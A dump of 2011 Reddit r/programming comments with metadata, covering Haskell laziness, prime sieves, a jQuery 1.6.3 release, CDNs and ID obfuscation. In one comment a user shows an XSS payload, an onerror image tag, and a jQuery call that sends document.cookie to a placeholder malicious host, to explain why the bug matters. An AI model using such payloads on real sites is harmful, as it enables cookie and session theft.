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True | rawlyn | null | You see, I used to have a lecturer that would throw crap like that into a question to see if anyone noticed the obvious problem. If nobody called him out on it, he would have a go at the whole class for being lazy readers and thinkers... ;) | null | 0 | 1314935863 | False | 0 | c2gxe0b | t3_k21i7 | null | t1_c2gxe0b | t1_c2gxcx5 | null | 1427548930 | 1 | t5_2fwo | null | null | null |
True | Kreepinetic | null | Google search for terms at site:msdn.net returns nothing, so unless google is uberfast at indexing them, this page was probably never microsoft's. | null | 0 | 1314935903 | False | 0 | c2gxe5q | t3_k22of | null | t1_c2gxe5q | t1_c2gxc3j | null | 1427548939 | 2 | t5_2fwo | null | null | null |
True | andytuba | null | assuming that `elem` is actually a DOM element, as the variable name hints, as opposed to a string selector or jQuery object. | null | 0 | 1314936155 | False | 0 | c2gxf83 | t3_k1lj4 | null | t1_c2gxf83 | t1_c2gx6tc | null | 1427548946 | 5 | t5_2fwo | null | null | null |
True | Fabien4 | null | > It seems to me a little over-optimistic to attempt to write a function that can evaluate the primeness of any number, without limit, in any language.
It's easy enough... provided you have time. It can take a hell of a lot of time.
Note that you can emulate all that in, say, C++. [I'll use `int`, but you could us... | null | 0 | 1314936202 | False | 0 | c2gxfeu | t3_k21i7 | null | t1_c2gxfeu | t1_c2gx8p3 | null | 1427548948 | 3 | t5_2fwo | null | null | null |
True | [deleted] | null | Can I ask for your opinion on [this approach](http://imgur.com/uXQNx)? | null | 0 | 1314936249 | False | 0 | c2gxfm0 | t3_jzpo5 | null | t1_c2gxfm0 | t1_c2gxbe4 | null | 1427548951 | 2 | t5_2fwo | null | null | null |
True | slurpme | null | Weird... haven't they just fixed this??? | null | 0 | 1314936297 | False | 0 | c2gxft8 | t3_k1bq3 | null | t1_c2gxft8 | t3_k1bq3 | null | 1427548954 | 0 | t5_2fwo | null | null | null |
True | andytuba | null | I thought that was a general JavaScript security limitation, not really something you can solve with a framework on top of it. Somebody correct me if I haven't done enough research? | null | 0 | 1314936300 | False | 0 | c2gxftn | t3_k1lj4 | null | t1_c2gxftn | t1_c2gx1n8 | null | 1427548954 | 9 | t5_2fwo | null | null | null |
True | rawlyn | null | What does it output when you input a number that is larger than can be represented within the confines of the system's memory? | null | 0 | 1314936512 | False | 0 | c2gxgr5 | t3_k21i7 | null | t1_c2gxgr5 | t1_c2gxfeu | null | 1427548966 | -2 | t5_2fwo | null | null | null |
True | hammar | null | I see you're waiting with monads until your fifth post. There might be hope for this one yet! | null | 0 | 1314936529 | False | 0 | c2gxgtc | t3_k1zew | null | t1_c2gxgtc | t3_k1zew | null | 1427548975 | 20 | t5_2fwo | null | null | null |
True | [deleted] | null | "Lazy programming." | null | 0 | 1314936530 | False | 0 | c2gxgti | t3_k21i7 | null | t1_c2gxgti | t1_c2gx4nz | null | 1427548975 | 8 | t5_2fwo | null | null | null |
True | Fabien4 | null | In practice, primes are a fairly bad example for lazy evaluation. The fastest algorithm for finding the first N primes is the sieve of Eratosthenes, which only works if you know the maximum in advance. | null | 0 | 1314936811 | False | 0 | c2gxhz2 | t3_k21i7 | null | t1_c2gxhz2 | t1_c2gx49u | null | 1427548987 | 3 | t5_2fwo | null | null | null |
True | starmonkey | null | Yes it's a security issue. If you don't understand this and do webdev, that's a big worry. Read more:
http://stackoverflow.com/questions/466737/why-is-cross-domain-ajax-a-security-concern
The way to get around this concern is to write a "proxy" page/script/etc on your server that pulls data from another domain and re... | null | 0 | 1314936858 | False | 0 | c2gxi58 | t3_k1lj4 | null | t1_c2gxi58 | t1_c2gxftn | null | 1427548989 | 4 | t5_2fwo | null | null | null |
True | RalfN | null | It's more than marketing. It's just release-early-release-often. In the past Firefox X.0 versions weren't really good. Too much new stuff, too little real world testing.
Then there was this whole thing of backporting all the security fixes to the stable code base, that had widely diverged from the trunk.
This new qui... | null | 0 | 1314936984 | False | 0 | c2gxinz | t3_k11yc | null | t1_c2gxinz | t1_c2gv5fx | null | 1427548998 | 1 | t5_2fwo | null | null | null |
True | adoran124 | null | >If you specify the whole version number with a CDN, it will never change on you and introduce features or bugs. This is the same for Google and Microsoft.
Can you really be 100% certain about that? | null | 0 | 1314936993 | False | 0 | c2gxipm | t3_k1lj4 | null | t1_c2gxipm | t1_c2gwr01 | null | 1427548998 | 3 | t5_2fwo | null | null | null |
True | dlg | null | Why, because we should never be able to predict when the toast will pop? | null | 0 | 1314937014 | False | 0 | c2gxisk | t3_k0y50 | null | t1_c2gxisk | t1_c2gubtr | null | 1427548997 | 2 | t5_2fwo | null | null | null |
True | andytuba | null | Thanks for the validation; I'm always a little worried when I put out something around here that I'll be wildly incorrect and hafta go cry in the corner about being a horrible programmer. | null | 0 | 1314937026 | False | 0 | c2gxiuk | t3_k1lj4 | null | t1_c2gxiuk | t1_c2gxi58 | null | 1427548998 | 3 | t5_2fwo | null | null | null |
True | browncsalum | null | Shriram makes no mistakes | null | 0 | 1314937042 | False | 0 | c2gxiww | t3_k21i7 | null | t1_c2gxiww | t1_c2gx4nz | null | 1427549000 | 3 | t5_2fwo | null | null | null |
True | ipeev | null | ...These craft harvest energy from the waves for propulsion
No, it looks like they are solar powered to me.
| null | 0 | 1314937095 | False | 0 | c2gxj5k | t3_k0gbq | null | t1_c2gxj5k | t3_k0gbq | null | 1427549001 | 0 | t5_2fwo | null | null | null |
True | antonivs | null | The issue is not with companies that aren't bluffing, it's with companies that have a weak patent case but are betting on being able to extort money from their victims with the threat of burying them with legal fees. | null | 0 | 1314937141 | False | 0 | c2gxjbv | t3_k11cr | null | t1_c2gxjbv | t1_c2gukhs | null | 1427549002 | 1 | t5_2fwo | null | null | null |
True | PericlesATX | null | I agree it makes sense to use CDNs in most cases. But some of us are developing apps for internal corporate use where in some cases there isn't even Internet access. | null | 0 | 1314937214 | False | 0 | c2gxjmu | t3_k1lj4 | null | t1_c2gxjmu | t1_c2gwr01 | null | 1427549004 | 2 | t5_2fwo | null | null | null |
True | abledanger | null | Bunch of Debbie Downers here. | null | 0 | 1314937223 | False | 0 | c2gxjoj | t3_k1lj4 | null | t1_c2gxjoj | t1_c2gwzcw | null | 1427549004 | 4 | t5_2fwo | null | null | null |
True | Fabien4 | null | We're talking about primes here. You'll be dead long before the program manages to reach such a value.
More seriously, GMP seems to have a limit of 16 GB per integer, which means it can only store 41 billion digits.^*[citation needed]* | null | 0 | 1314937247 | False | 0 | c2gxjs7 | t3_k21i7 | null | t1_c2gxjs7 | t1_c2gxgr5 | null | 1427549006 | 3 | t5_2fwo | null | null | null |
True | propool | null | you can if you fetch json and specify the callback function in the request. | null | 0 | 1314937281 | False | 0 | c2gxjxv | t3_k1lj4 | null | t1_c2gxjxv | t1_c2gx1n8 | null | 1427549007 | 1 | t5_2fwo | null | null | null |
True | Fabien4 | null |
I just noticed I didn't really answer your question.
The program probably will crash, and thus won't output anything. | null | 0 | 1314937378 | False | 0 | c2gxkd5 | t3_k21i7 | null | t1_c2gxkd5 | t1_c2gxgr5 | null | 1427549013 | 1 | t5_2fwo | null | null | null |
True | generic_0 | null | Yeah, I was sort basing that statement on the whole bug report fiasco recently demonstrating a bit of a cavalier attitude toward embracing user preference rather than attempting to force it. The general dismissive attitude towards enterprise usage is sort of also part of the same underlying problem imo.
That being sa... | null | 0 | 1314937436 | False | 0 | c2gxkm7 | t3_k11yc | null | t1_c2gxkm7 | t1_c2gx87m | null | 1427549017 | 3 | t5_2fwo | null | null | null |
True | tehwebguy | null | Wow, I counted 32 bug fixes, but I've never come across one of them myself. It's like I just realized that it's even possible for jQuery to have bugs (that's how good it is) | null | 0 | 1314937437 | False | 0 | c2gxkmg | t3_k1lj4 | null | t1_c2gxkmg | t3_k1lj4 | null | 1427549017 | 1 | t5_2fwo | null | null | null |
True | [deleted] | null | Meh. People write large scale apps in similar dynamic languages (Ruby, Python, Lisp, etc). People have written huge mission critical apps in dynamic languages. What makes Javascript different? | null | 0 | 1314937512 | False | 0 | c2gxkws | t3_k11yc | null | t1_c2gxkws | t1_c2grvr3 | null | 1427549021 | 2 | t5_2fwo | null | null | null |
True | [deleted] | null | Where's the Java equivalent of this benchmark? | null | 0 | 1314937516 | False | 0 | c2gxkxd | t3_k11yc | null | t1_c2gxkxd | t1_c2gxcte | null | 1427549021 | 1 | t5_2fwo | null | null | null |
True | rghd | null | Bookmarking to read whenever I get more into Haskell. | null | 0 | 1314937552 | False | 0 | c2gxl36 | t3_k21i7 | null | t1_c2gxl36 | t3_k21i7 | null | 1427549023 | 3 | t5_2fwo | null | null | null |
True | deboerpa | null | Presumably the actual temperature doesn't really matter anyway because I'm only looking for the useless reading that wildly fluctuates at the least significant digit. I agree that such a senor could be impractical.
In your example it would be like looking at the least significant digit of a wildly fluctuating gps coor... | null | 0 | 1314937553 | True | 0 | c2gxl3d | t3_k0y50 | null | t1_c2gxl3d | t1_c2gx3iu | null | 1427549023 | 1 | t5_2fwo | null | null | null |
True | dolske | null | [Ok.](http://blog.mozilla.com/nnethercote/2011/08/09/firefox-7-is-lean-and-fast-2/)
What next? More? [Fine.](http://blog.mozilla.com/nnethercote/2011/08/24/memshrink-progress-week-10/) | null | 0 | 1314937753 | False | 0 | c2gxlwa | t3_k11yc | null | t1_c2gxlwa | t1_c2gx7lp | null | 1427549033 | 7 | t5_2fwo | null | null | null |
True | [deleted] | null | [deleted] | null | 0 | 1314937789 | False | 0 | c2gxm1o | t3_k1lj4 | null | t1_c2gxm1o | t1_c2gwxb0 | null | 1427549035 | -5 | t5_2fwo | null | null | null |
True | RalfN | null | http://shootout.alioth.debian.org/u32/benchmark.php?test=regexdna&lang=java
But if you prefer, you can also try to make the C or C++ version fast enough to beat V8 ;-)
The C++ code seems reasonably similar:
http://shootout.alioth.debian.org/u32/program.php?test=regexdna&lang=gpp&id=2 | null | 0 | 1314937820 | False | 0 | c2gxm5c | t3_k11yc | null | t1_c2gxm5c | t1_c2gxkxd | null | 1427549037 | 1 | t5_2fwo | null | null | null |
True | dmwit | null | Personally, I prefer to believe that when my Haskell VM runs out of memory, it throws up a prompt telling me to insert bigger RAM chips. | null | 0 | 1314937973 | False | 0 | c2gxmrx | t3_k21i7 | null | t1_c2gxmrx | t1_c2gxe0b | null | 1427549045 | 2 | t5_2fwo | null | null | null |
True | twomz | null | TBH I've been following the JQM changes more, which we'll probably want if they fixed any known bugs. This post just reminded me that Beta 3 is coming out soon. | null | 0 | 1314938100 | False | 0 | c2gxnbg | t3_k1lj4 | null | t1_c2gxnbg | t1_c2gwre4 | null | 1427549059 | 0 | t5_2fwo | null | null | null |
True | twomz | null | Our customers deserve the best, and how can we give them the best if we're using an outdated version of JQuery? HHHHMMMM??????? | null | 0 | 1314938146 | False | 0 | c2gxnhv | t3_k1lj4 | null | t1_c2gxnhv | t1_c2gwh4d | null | 1427549054 | -10 | t5_2fwo | null | null | null |
True | itslikeadog | null | Civility doesn't cost anything. I mean, if you don't know about continuous integration Jenkins probably isn't for you, but why not just *say* that instead? | null | 0 | 1314938265 | True | 0 | c2gxnz6 | t3_jziok | null | t1_c2gxnz6 | t1_c2gvclx | null | 1427549060 | 2 | t5_2fwo | null | null | null |
True | bitchessuck | null | Using shaders for video decoding is not very useful or efficient. This article shows it, again. The fact alone that entropy coding is inherently not parallel, while it is usually the most demanding decoding step for high-bitrate video (i.e. when you need acceleration the most!), pretty much seals the deal.
GPUs do not... | null | 0 | 1314938300 | True | 0 | c2gxo3n | t3_k16kq | null | t1_c2gxo3n | t3_k16kq | null | 1427549062 | 4 | t5_2fwo | null | null | null |
True | nandemo | null | That's lazy reading. | null | 0 | 1314938306 | False | 0 | c2gxo4j | t3_k21i7 | null | t1_c2gxo4j | t1_c2gxl36 | null | 1427549062 | 27 | t5_2fwo | null | null | null |
True | dmwit | null | Even a mere 8% of Chinese people would still give 80 million hits from a database query. | null | 0 | 1314938505 | False | 0 | c2gxowy | t3_jzpo5 | null | t1_c2gxowy | t1_c2gklwn | null | 1427549072 | 1 | t5_2fwo | null | null | null |
True | itslikeadog | null | Looks like this is geared at larger projects that need to automatically make sure that no one breaks the build. Others have been [more](http://www.pragmaticautomation.com/cgi-bin/pragauto.cgi/Monitor/Devices/BubbleBubbleBuildsInTrouble.rdoc) [inventive](https://github.com/codedance/Retaliation) in the ways they do this... | null | 0 | 1314938588 | False | 0 | c2gxp9f | t3_jziok | null | t1_c2gxp9f | t1_c2gu4kl | null | 1427549077 | 2 | t5_2fwo | null | null | null |
True | fuzzysarge | null | The NSA had certified diodes and resistors that are 'faulty'/ or leaky. The diodes are not doped properally, so their transiant curve is not constant/reproducable. It sometimes breaks down at .7 V other times it will break down at .2 , some times at 4 V. You feed that voltage into an A/D converter and their you have... | null | 0 | 1314938859 | False | 0 | c2gxqbg | t3_k0y50 | null | t1_c2gxqbg | t1_c2gxl3d | null | 1427549092 | 1 | t5_2fwo | null | null | null |
True | SDRealist | null | > Yeah why learn to be a real pro rammer when someone else can do it for you.
"Real" programmers should know *how* the wheel was invented but they shouldn't be constantly reinventing half-assed versions of it. | null | 0 | 1314938875 | False | 0 | c2gxqdy | t3_k1bq3 | null | t1_c2gxqdy | t1_c2gucpy | null | 1427549092 | 6 | t5_2fwo | null | null | null |
True | grauenwolf | null | No. By the defintion found in just about textbook on comptuer science. | null | 0 | 1314939124 | False | 0 | c2gxrdl | t3_k1do5 | null | t1_c2gxrdl | t1_c2gvi3i | null | 1427549110 | 0 | t5_2fwo | null | null | null |
True | [deleted] | null | You managed to pin-point the only benchmark that V8 won. Not only that, but you managed to pick out a benchmark that has very little to do with how well V8 can optimize javascript, but instead showcases V8's superb regexp engine. It comes as no surprise that google would put so much effort into a highly optmized reg... | null | 0 | 1314939319 | False | 0 | c2gxs5m | t3_k11yc | null | t1_c2gxs5m | t1_c2gxm5c | null | 1427549121 | 1 | t5_2fwo | null | null | null |
True | gearvOsh | null | Mootools > | null | 0 | 1314939583 | False | 0 | c2gxt5t | t3_k1lj4 | null | t1_c2gxt5t | t1_c2gup7g | null | 1427549129 | 1 | t5_2fwo | null | null | null |
True | gearvOsh | null | Yet jQuery is still broken in IEx when rendering as XHTML. | null | 0 | 1314939604 | False | 0 | c2gxt8s | t3_k1lj4 | null | t1_c2gxt8s | t3_k1lj4 | null | 1427549130 | 3 | t5_2fwo | null | null | null |
True | kenkirou | null | Can you really be 100% certain about anything? | null | 0 | 1314939683 | False | 0 | c2gxtjj | t3_k1lj4 | null | t1_c2gxtjj | t1_c2gxipm | null | 1427549133 | 3 | t5_2fwo | null | null | null |
True | strager | null | Just visit `#<img/src/onerror=alert(document.cookie)>` on an affected site. Now imagine the alert was replaced with an XHR call (e.g. `$.get("http://malicious.com/server/"+document.cookie)`). Now I have your cookies (or any data I can scrape from the page using JavaScript). | null | 0 | 1314940078 | False | 0 | c2gxv3l | t3_k1bq3 | null | t1_c2gxv3l | t1_c2gvawt | null | 1427549154 | 2 | t5_2fwo | null | null | null |
True | [deleted] | null | This reminds me of [a brilliant anecdote about ultrafinitism](http://www.scottaaronson.com/blog/?p=103).
> From [these lecture notes](http://www.math.ohio-state.edu/%7Efriedman/pdf/Princeton532.pdf) by Harvey Friedman comes one of the best metamathematical anecdotes I’ve ever heard (and yes, I’ve heard my share). A... | null | 0 | 1314940111 | False | 0 | c2gxv8c | t3_k21i7 | null | t1_c2gxv8c | t1_c2gx68a | null | 1427549156 | 25 | t5_2fwo | null | null | null |
True | [deleted] | null | [deleted] | null | 0 | 1314940141 | True | 0 | c2gxvck | t3_k1zew | null | t1_c2gxvck | t1_c2gxgtc | null | 1427549157 | 1 | t5_2fwo | null | null | null |
True | -main | null | A lot of people really identify with their name. And people get shitty when you step on their identitiy. | null | 0 | 1314940209 | False | 0 | c2gxvli | t3_jzpo5 | null | t1_c2gxvli | t1_c2gfhwz | null | 1427549160 | 1 | t5_2fwo | null | null | null |
True | aaronla | null | If the thunk remains valid after OOM, you wouldn't be far off. :-) | null | 0 | 1314940375 | False | 0 | c2gxw75 | t3_k21i7 | null | t1_c2gxw75 | t1_c2gxmrx | null | 1427549168 | 2 | t5_2fwo | null | null | null |
True | dkitch | null | Congrats, you sorta-kinda implemented a variation on a [v5 UUID](http://en.wikipedia.org/wiki/Universally_Unique_Identifier). Why not just use [uniquid](http://us3.php.net/uniqid) or one of the several other PHP UUID implementations instead of reinventing the wheel? | null | 0 | 1314940540 | False | 0 | c2gxwtp | t3_k1owo | null | t1_c2gxwtp | t3_k1owo | null | 1427549176 | 2 | t5_2fwo | null | null | null |
True | itslikeadog | null | Well there are a few clever implementations that don't need to know the max beforehand. The best example I can think of right now is [this generator](http://stackoverflow.com/questions/567222/simple-prime-generator-in-python/568618#568618) in Python. | null | 0 | 1314940670 | False | 0 | c2gxx9s | t3_k21i7 | null | t1_c2gxx9s | t1_c2gxhz2 | null | 1427549181 | 4 | t5_2fwo | null | null | null |
True | -main | null | Also titles. And suffixes ("Andrew Somename, MD. BSc. (Hons)") Also, name to use when your system addresses them. | null | 0 | 1314940767 | False | 0 | c2gxxmu | t3_jzpo5 | null | t1_c2gxxmu | t1_c2ggsxo | null | 1427549186 | 1 | t5_2fwo | null | null | null |
True | Fabien4 | null | >Just visit `#<img/src/o`...
Why would I do that?
Why would I decide to trick a page into sending my data to an attacker?
The author of the page has no interest in putting that kind of code either, since he created the cookie himself.
| null | 0 | 1314940838 | False | 0 | c2gxxwi | t3_k1bq3 | null | t1_c2gxxwi | t1_c2gxv3l | null | 1427549190 | 2 | t5_2fwo | null | null | null |
True | -main | null | Don't assume a zip, either. NZ postcodes are not US ones. And we don't actually have states here at all. | null | 0 | 1314940914 | False | 0 | c2gxy65 | t3_jzpo5 | null | t1_c2gxy65 | t1_c2ggi4l | null | 1427549193 | 1 | t5_2fwo | null | null | null |
True | pingveno | null | Speaking of regular expression engines, it looks like Java's engine is stunningly slow considering how much work has been put into speeding up Java. It loses out to the current Python engine, which itself is about to be replaced by a faster version. | null | 0 | 1314940923 | False | 0 | c2gxy7a | t3_k11yc | null | t1_c2gxy7a | t1_c2gxs5m | null | 1427549194 | 2 | t5_2fwo | null | null | null |
True | strager | null | You never click links on the web? Ever?
| null | 0 | 1314940975 | False | 0 | c2gxyec | t3_k1bq3 | null | t1_c2gxyec | t1_c2gxxwi | null | 1427549196 | 2 | t5_2fwo | null | null | null |
True | sclv | null | Buy more memory. You're confusing how a program executes with what it *means*. We could have programs even without any computers, and they would mean exactly what they do now. We just wouldn't be able to *evaluate* them particularly efficiently. | null | 0 | 1314941482 | False | 0 | c2gy069 | t3_k21i7 | null | t1_c2gy069 | t1_c2gxgr5 | null | 1428195725 | 11 | t5_2fwo | null | null | null |
True | [deleted] | null | WTF? I use them all the time. Who doesn't? | null | 0 | 1314941576 | False | 0 | c2gy0i7 | t3_k12ka | null | t1_c2gy0i7 | t3_k12ka | null | 1427549225 | 2 | t5_2fwo | null | null | null |
True | sclv | null | Nah.. you can do better: http://en.wikipedia.org/wiki/Sieve_of_Atkin
And the lazy wheel is pretty awesome (and makes essential use of laziness) too: http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.55.7096 | null | 0 | 1314941689 | False | 0 | c2gy0wz | t3_k21i7 | null | t1_c2gy0wz | t1_c2gxhz2 | null | 1427549231 | 13 | t5_2fwo | null | null | null |
True | freakyhair | null | This makes sense. I write a lot of embedded code without RTOS (I'm an EE/CE), and I use a TON of state machines. I'm just comfortable with them. They are easy to doc, and easy to follow and alter. | null | 0 | 1314942037 | False | 0 | c2gy25n | t3_k12ka | null | t1_c2gy25n | t1_c2gpvdq | null | 1427549246 | 1 | t5_2fwo | null | null | null |
True | Fabien4 | null | Interesting, but as `xiao` said on SO, it doesn't seem awfully efficient.
(For the record, a straightforward implementation computes all primes up to 10^10 in 3 minutes using 640 MB of RAM.) | null | 0 | 1314942144 | False | 0 | c2gy2j8 | t3_k21i7 | null | t1_c2gy2j8 | t1_c2gxx9s | null | 1427549251 | 4 | t5_2fwo | null | null | null |
True | gospelwut | null | >Fix an XSS attack vector:
That's what I like to see at the top of the notes. I'm not being facetious. | null | 0 | 1314942176 | False | 0 | c2gy2na | t3_k1lj4 | null | t1_c2gy2na | t3_k1lj4 | null | 1427549252 | 2 | t5_2fwo | null | null | null |
True | Fabien4 | null | I do. However, if I click on a link, it's on the page in question, meaning that the author of the page put it there. | null | 0 | 1314942242 | False | 0 | c2gy2uw | t3_k1bq3 | null | t1_c2gy2uw | t1_c2gxyec | null | 1427549255 | 1 | t5_2fwo | null | null | null |
True | k3n | null | For jQuery, I think odd-numbered maintenance releases are bug fixes, and evens are usually performance enhancements. Minor point upgrades I think are for API changes. Thus, 1.6.x compatibility is a non-issue (bugs notwithstanding).
Also, jQuery strives to maintain BC, especially with its core offering. With that said... | null | 0 | 1314942257 | False | 0 | c2gy2xb | t3_k1lj4 | null | t1_c2gy2xb | t1_c2gv9mc | null | 1427549256 | 1 | t5_2fwo | null | null | null |
True | gospelwut | null | But the real question is does it come with ajax spinning gifs? | null | 0 | 1314942325 | False | 0 | c2gy36h | t3_k1lj4 | null | t1_c2gy36h | t1_c2gwbuj | null | 1427549259 | 2 | t5_2fwo | null | null | null |
True | DustinEwan | null | It didn't say that developers don't understand state machines, just that they don't often use them (or enough, I suppose). | null | 0 | 1314942376 | False | 0 | c2gy3cr | t3_k12ka | null | t1_c2gy3cr | t1_c2gsghv | null | 1427549267 | 2 | t5_2fwo | null | null | null |
True | gospelwut | null | Is there actually a debate? As in mailinglists/BBS/blogs full of fiery rhetoric? | null | 0 | 1314942412 | False | 0 | c2gy3gv | t3_k1lj4 | null | t1_c2gy3gv | t1_c2gwqby | null | 1427549263 | 2 | t5_2fwo | null | null | null |
True | artsrc | null | You want the benefits of some tool to validate the type safety while you are developing.
So you don't need a standard language in the browser. You need one in your IDE.
So you can use Java and GWT or invent a strongly typed CoffeeScript.
| null | 0 | 1314942440 | False | 0 | c2gy3k6 | t3_k11yc | null | t1_c2gy3k6 | t1_c2grvr3 | null | 1427549264 | 2 | t5_2fwo | null | null | null |
True | k3n | null | I [just finished](http://www.reddit.com/r/programming/comments/k1lj4/jquery_163_released/c2gy2xb) almost exactly the same thing. In short, it was painless. | null | 0 | 1314942497 | False | 0 | c2gy3qv | t3_k1lj4 | null | t1_c2gy3qv | t1_c2gwf6j | null | 1427549269 | 2 | t5_2fwo | null | null | null |
True | generic_0 | null | This makes very little sense as a joke considering how often it's parroted around here. | null | 0 | 1314942606 | False | 0 | c2gy44l | t3_k0pdk | null | t1_c2gy44l | t1_c2gvbxk | null | 1427549273 | 3 | t5_2fwo | null | null | null |
True | distortednet | null | sorry, but i'll toss in a snuggie | null | 0 | 1314942706 | False | 0 | c2gy4gu | t3_k1lj4 | null | t1_c2gy4gu | t1_c2gy36h | null | 1427549276 | 1 | t5_2fwo | null | null | null |
True | [deleted] | null | Not only is there sometimes no internet access, but you will never ever find a CDN which is faster than a local copy served via a gigabit LAN. | null | 0 | 1314943029 | False | 0 | c2gy5hs | t3_k1lj4 | null | t1_c2gy5hs | t1_c2gxjmu | null | 1427549290 | 2 | t5_2fwo | null | null | null |
True | [deleted] | null | Because your clients usually don't care what version of jQuery their site is running. They care that it always works and doesn't suddenly break down without warning. | null | 0 | 1314943126 | False | 0 | c2gy5t5 | t3_k1lj4 | null | t1_c2gy5t5 | t1_c2gwr01 | null | 1427549295 | 1 | t5_2fwo | null | null | null |
True | YellowOnion | null | > Just have a fucking conversation with me without getting pissed off. I'm not insulting your mother I'm talking about SSL.
The words I write has no emotional tone, because they're only words
Have you heard of this: http://en.wikipedia.org/wiki/Projection_\(psychology\)
> Can you draw a distinction between wha... | null | 0 | 1314943184 | False | 0 | c2gy602 | t3_jya5h | null | t1_c2gy602 | t1_c2grb5c | null | 1427549296 | 1 | t5_2fwo | null | null | null |
True | [deleted] | null | [deleted] | null | 0 | 1314943250 | False | 0 | c2gy67l | t3_k21i7 | null | t1_c2gy67l | t1_c2gxe0b | null | 1427549299 | 1 | t5_2fwo | null | null | null |
True | strager | null | Did you read the article? If you did, the link to the article was *not* on the page in question.
Remember that this exploit doesn't have to be triggered via a UI event (e.g. mouse click). | null | 0 | 1314943433 | False | 0 | c2gy6ts | t3_k1bq3 | null | t1_c2gy6ts | t1_c2gy2uw | null | 1427549307 | 3 | t5_2fwo | null | null | null |
True | zynasis | null | Appropriately using Haskel, where you can learn a language that nobody uses, to work nowhere, and then do nothing with your life (except write stupid assignments). | null | 0 | 1314943733 | True | 0 | c2gy7rv | t3_k21i7 | null | t1_c2gy7rv | t3_k21i7 | null | 1427549320 | -21 | t5_2fwo | null | null | null |
True | aaronla | null | > Why not just use uniquid
The server needs to be able to reverse map the values.
[FooBarWidget](http://www.reddit.com/r/programming/comments/k1owo/how_to_obfuscate_integer_ids/c2guv4d) is right about encryption [GeekySpicyCoderChix](http://www.reddit.com/r/programming/comments/k1owo/how_to_obfuscate_integer_ids/... | null | 0 | 1314943833 | False | 0 | c2gy830 | t3_k1owo | null | t1_c2gy830 | t1_c2gxwtp | null | 1427549323 | 2 | t5_2fwo | null | null | null |
True | nikbackm | null | Perhaps you could try to make a new clean profile and see if that makes a difference. They tend to accumulate some cruft over the years.
| null | 0 | 1314944073 | False | 0 | c2gy8u8 | t3_k11yc | null | t1_c2gy8u8 | t1_c2gx7fh | null | 1427549333 | 2 | t5_2fwo | null | null | null |
True | masklinn | null | They've tried to stop breaking every other point-release since 1.5. As far as I've seen, short of regressions they've done a pretty good job at not breaking everything from 1.6.0 to 1.6.1 to 1.6.2 (they did rollback the 1.6.0 `.attr` changes, but that made the lib more compatible with 1.5, not less compatible with 1.6.... | null | 0 | 1314944211 | False | 0 | c2gy98u | t3_k1lj4 | null | t1_c2gy98u | t1_c2gv9mc | null | 1427549339 | 1 | t5_2fwo | null | null | null |
True | deathwebo | null | yreeah but the backend php returns html, so i need to load this html in a div | null | 0 | 1314944300 | False | 0 | c2gy9i9 | t3_k1lj4 | null | t1_c2gy9i9 | t1_c2gxjxv | null | 1427549341 | 1 | t5_2fwo | null | null | null |
True | nikbackm | null | Many, many web pages have content not put there by its initial author. Think user comments and stuff like that.
| null | 0 | 1314944387 | False | 0 | c2gy9ri | t3_k1bq3 | null | t1_c2gy9ri | t1_c2gy2uw | null | 1427549346 | 1 | t5_2fwo | null | null | null |
True | OopsLostPassword | null | > I was asking, not critisizing, no thanks for your not-an-answer.
I was asking too. It seems to me that merging master into the feature branch and then merging the feature branch into master is enough. But I'm probably not better than you at git and I thought you had a reason to exclude it that I couldn't see (giv... | null | 0 | 1314944659 | False | 0 | c2gyak2 | t3_k0dpk | null | t1_c2gyak2 | t1_c2gsm68 | null | 1427549356 | 4 | t5_2fwo | null | null | null |
True | OopsLostPassword | null | I do it using jsonp. It's a little heavier but perfectly doable (don't open your html file as file://) | null | 0 | 1314944947 | False | 0 | c2gybe1 | t3_k1lj4 | null | t1_c2gybe1 | t1_c2gx1n8 | null | 1427549366 | 1 | t5_2fwo | null | null | null |
True | [deleted] | null | [deleted] | null | 0 | 1314945025 | False | 0 | c2gybm8 | t3_k1lj4 | null | t1_c2gybm8 | t1_c2gxnbg | null | 1427549369 | 1 | t5_2fwo | null | null | null |
True | paniq | null | ...all for just bringing the core feature of CSS selection to JavaScript. I can see that becoming a browser standard somewhere in the future. | null | 0 | 1314945050 | False | 0 | c2gybot | t3_k1lj4 | null | t1_c2gybot | t1_c2gup7g | null | 1427549370 | 6 | t5_2fwo | null | null | null |
True | gospelwut | null | I already have a robe I can put on backwards! | null | 0 | 1314945431 | False | 0 | c2gycsk | t3_k1lj4 | null | t1_c2gycsk | t1_c2gy4gu | null | 1427549384 | 2 | t5_2fwo | null | null | null |
True | sockpuppetzero | null | There is a good reason to prefer base 64 to either 62 or 80: 64 is a power of two, and thus cheaper to encode/decode.
Yes, base 80 is a tad smaller, which is a good reason to prefer it to base 64. I don't see any reason to go with base 62 at all. | null | 0 | 1314945576 | True | 0 | c2gyd7t | t3_k1owo | null | t1_c2gyd7t | t1_c2guiae | null | 1427549389 | 2 | t5_2fwo | null | null | null |
True | nonsensepoem | null | Even so, I had to kick and scream for months before my team's architects would allow me to use it. And now they won't let me update it to the latest version. For fuck's sake. | null | 0 | 1314945610 | False | 0 | c2gydbn | t3_k1lj4 | null | t1_c2gydbn | t1_c2gwk49 | null | 1427549391 | 9 | t5_2fwo | null | null | null |
True | sockpuppetzero | null | Of course it depends on what you intend on doing, but for many purposes a nonce would be unnecessary. The question is, do you want people to see that two obfuscated IDs are the same, or not? | null | 0 | 1314945913 | False | 0 | c2gye4t | t3_k1owo | null | t1_c2gye4t | t1_c2gy830 | null | 1427549402 | 1 | t5_2fwo | null | null | null |
True | toba | null | ...unless you or your buddy/fake not-your-corporation sues us first.
"I've got a gun and I won't use it unless you come into my house." | null | 0 | 1314946375 | False | 0 | c2gyffb | t3_k11cr | null | t1_c2gyffb | t1_c2gujuu | null | 1427549483 | 2 | t5_2fwo | null | null | null |
True | sockpuppetzero | null | I agree with you, except that I disagree with your choice of mode. In this case, the size of your message you wish to encrypt is smaller than a single block; you are definitely better off with ECB and an optional nonce, depending on whether or not you want to hide the fact that two obfuscated IDs are the same or dif... | null | 0 | 1314946551 | True | 0 | c2gyfwg | t3_k1owo | null | t1_c2gyfwg | t1_c2guv4d | null | 1427549489 | 6 | t5_2fwo | null | null | null |
True | wowoc | null | It also seems like challenges in dynamic programming. | null | 0 | 1314946632 | False | 0 | c2gyg3u | t3_k21i7 | null | t1_c2gyg3u | t3_k21i7 | null | 1427549492 | 4 | t5_2fwo | null | null | null |
True | funkah | null | Hate on dude all you want but he's right. Especially about the cop-out stuff. | null | 0 | 1314946819 | False | 0 | c2gyglv | t3_k11rr | null | t1_c2gyglv | t3_k11rr | null | 1427549498 | 1 | t5_2fwo | null | null | null |
